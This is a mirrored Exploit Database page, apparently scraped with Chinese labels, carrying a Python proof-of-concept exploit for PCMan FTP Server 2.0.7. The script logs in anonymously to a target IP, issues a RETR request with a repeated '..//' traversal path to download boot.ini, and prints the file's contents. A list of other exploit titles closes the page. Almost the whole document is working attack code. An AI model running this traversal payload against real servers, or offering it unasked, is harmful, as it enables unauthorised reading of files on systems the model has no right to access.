PCMan FTP Server 2.0.7 – Directory Traversal

Exploit Database
13 阅读

作者： Jay Turla

日期： 2015-09-28
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/38340/

#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC) 

from ftplib import FTP

ftp = FTP(raw_input("Target IP: ")) 
ftp.login() 
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

last Exploits
PCMan FTP Server 2.0.7 – Directory Traversal的更多信息

Screen SFT DAB 600/C – Authentication Bypass Erase Account：
Dup Scout Enterprise 9.5.14 – GET Buffer Overflow (Metasploit)：
War-FTPD 1.65 – ‘Username’ Remote Overflow (Metasploit)：
Oracle Document Capture 10.1.3.5 – Insecure Method / Buffer Overflow：
Tumbleweed SecureTransport FileTransfer – ‘vcst_eu.dll’ ActiveX Control Buffer Overflow (Metasploit)：
Apache Struts – ‘ParametersInterceptor’ Remote Code Execution (Metasploit)：
Cisco RV130W 1.0.3.44 – Remote Stack Overflow：
Oracle AutoVue 20.0.1 AutoVueX – ActiveX Control SaveViewStateToFile：